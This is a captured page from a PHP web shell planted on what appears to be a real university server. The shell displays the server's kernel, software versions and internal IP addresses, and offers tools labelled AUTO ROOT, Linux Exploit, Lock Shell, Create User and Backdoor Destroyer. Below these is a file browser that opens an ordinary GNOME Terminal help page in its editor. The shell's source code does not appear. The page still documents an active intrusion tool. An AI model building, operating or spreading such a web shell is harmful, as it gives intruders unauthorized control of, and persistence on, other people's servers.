Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
help /
C /
gnome-terminal /
[ HOME SHELL ]
Name
Size
Permission
Action
figures
[ DIR ]
drwxr-xr-x
adv-keyboard-shortcuts.page
12.98
KB
-rw-r--r--
app-colors.page
6.51
KB
-rw-r--r--
app-cursor.page
2.08
KB
-rw-r--r--
app-fonts.page
4.05
KB
-rw-r--r--
app-fullscreen.page
2.07
KB
-rw-r--r--
app-terminal-sizes.page
3.08
KB
-rw-r--r--
app-zoom.page
1.73
KB
-rw-r--r--
gs-execute-commands.page
2.03
KB
-rw-r--r--
gs-tabs.page
5.42
KB
-rw-r--r--
index.page
1.72
KB
-rw-r--r--
introduction.page
1.42
KB
-rw-r--r--
legal.xml
998
B
-rw-r--r--
overview.page
3.97
KB
-rw-r--r--
pref-bell.page
1.92
KB
-rw-r--r--
pref-custom-command.page
2.8
KB
-rw-r--r--
pref-custom-exit.page
2.43
KB
-rw-r--r--
pref-keyboard-access.page
3.19
KB
-rw-r--r--
pref-login-shell.page
3.07
KB
-rw-r--r--
pref-menubar.page
2.08
KB
-rw-r--r--
pref.page
746
B
-rw-r--r--
pref-profile-char-width.page
1.82
KB
-rw-r--r--
pref-profile-encoding.page
1.69
KB
-rw-r--r--
pref-profiles.page
9.11
KB
-rw-r--r--
pref-scrolling.page
5.31
KB
-rw-r--r--
pref-tab-window.page
2.54
KB
-rw-r--r--
pref-user-input.page
1.56
KB
-rw-r--r--
prob-reset.page
2.41
KB
-rw-r--r--
txt-copy-paste.page
2.12
KB
-rw-r--r--
txt-links.page
3.01
KB
-rw-r--r--
txt-search.page
3.02
KB
-rw-r--r--
txt-select-text.page
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gs-execute-commands.page
<page xmlns="http://projectmallard.org/1.0/" xmlns:its="http://www.w3.org/2005/11/its" type="guide" id="gs-execute-commands"> <info> <link type="guide" xref="index#getting-started"/> <link type="seealso" xref="txt-copy-paste"/> <link type="seealso" xref="overview"/> <revision pkgversion="3.8" date="2013-02-25" status="candidate"/> <revision pkgversion="3.12" date="2014-03-24" status="candidate"/> <credit type="author copyright"> <name>Sindhu S</name> <email its:translate="no">sindhus@live.in</email> <years>2013</years> </credit> <credit type="copyright editor"> <name>Ekaterina Gerasimova</name> <email its:translate="no">kittykat3756@gmail.com</email> <years>2013–2014</years> </credit> <credit type="copyright editor"> <name>Michael Hill</name> <email its:translate="no">mdhillca@gmail.com</email> <years>2013</years> </credit> <include href="legal.xml" xmlns="http://www.w3.org/2001/XInclude"/> <desc>Launch programs or run commands using <app>Terminal</app>.</desc> </info> <title>Execute a command</title> <p>Any input entered in the <app>Terminal</app> to be executed is referred to as a <em>command</em>. You can run both command line and graphical user interface (GUI) programs from the terminal.</p> <p>To execute commands:</p> <steps> <item> <p>Type the command in the <app>Terminal</app> prompt.</p> </item> <item> <p>Press <key>Enter</key> to execute it.</p> </item> </steps> <p>If you have a program that ends abruptly without any warning or error, you may want to run it in <app>Terminal</app>. This will allow the program to output any error or debugging messages to the <app>Terminal</app> window. This information can be helpful when filing a bug report.</p> <note style="tip"> <p>Read about the <link href="https://www.gnu.org/software/bash/manual/">Bash shell</link> for more information on what you can do in a terminal.</p> </note> </page>
Close